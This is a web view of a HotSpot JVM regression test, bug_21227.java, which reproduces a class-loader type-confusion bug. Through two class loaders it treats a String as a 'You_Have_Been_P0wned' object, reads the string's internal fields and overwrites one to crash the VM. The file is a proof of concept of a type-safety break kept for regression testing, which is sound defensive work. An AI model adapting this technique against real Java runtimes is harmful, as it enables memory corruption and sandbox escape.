Mercurial > hg > truffle
view test/runtime/6626217/bug_21227.java @ 10185:d50cc62e94ff
8012715: G1: GraphKit accesses PtrQueue::_index as int but is size_t
Summary: In graphKit INT operations were generated to access PtrQueue::_index which has type size_t. This is 64 bit on 64-bit machines. No problems occur on little endian machines as long as the index fits into 32 bit, but on big endian machines the upper part is read, which is zero. This leads to unnecessary branches to the slow path in the runtime.
Reviewed-by: twisti, johnc
Contributed-by: Martin Doerr <martin.doerr@sap.com>
author | johnc |
---|---|
date | Wed, 24 Apr 2013 14:48:43 -0700 |
parents | 495caa35b1b5 |
children |
line wrap: on
line source
import java.lang.reflect.*; import java.security.*; abstract public class bug_21227 { // Jam anything you want in here, it will be cast to a You_Have_Been_P0wned public static Object _p0wnee; public static void main(String argv[]) throws ClassNotFoundException, InstantiationException, IllegalAccessException { System.out.println("Warmup"); // Make a Class 'many_loader' under the default loader bug_21227 bug = new many_loader(); // Some classes under a new Loader, LOADER2, including another version of 'many_loader' ClassLoader LOADER2 = new Loader2(); Class clazz2 = LOADER2.loadClass("from_loader2"); IFace iface = (IFace)clazz2.newInstance(); // Set the victim, a String of length 6 String s = "victim"; _p0wnee = s; // Go cast '_p0wnee' to type You_Have_Been_P0wned many_loader[] x2 = bug.make(iface); many_loader b = x2[0]; // Make it clear that the runtime type many_loader (what we get from the // array X2) varies from the static type of many_loader. Class cl1 = b.getClass(); ClassLoader ld1 = cl1.getClassLoader(); Class cl2 = many_loader.class; ClassLoader ld2 = cl2.getClassLoader(); System.out.println("bug.make() "+ld1+":"+cl1); System.out.println("many_loader "+ld2+":"+cl2); // Read the victims guts out You_Have_Been_P0wned q = b._p0wnee; System.out.println("q._a = 0x"+Integer.toHexString(q._a)); System.out.println("q._b = 0x"+Integer.toHexString(q._b)); System.out.println("q._c = 0x"+Integer.toHexString(q._c)); System.out.println("q._d = 0x"+Integer.toHexString(q._d)); System.out.println("I will now crash the VM:"); // On 32-bit HotSpot Java6 this sets the victim String length shorter, then crashes the VM //q._c = 3; q._a = -1; System.out.println(s); } // I need to compile (hence call in a loop) a function which returns a value // loaded from classloader other than the system one. The point of this // call is to give me an abstract 'hook' into a function loaded with a // foreign loader. public abstract many_loader[] make( IFace iface ); // abstract factory }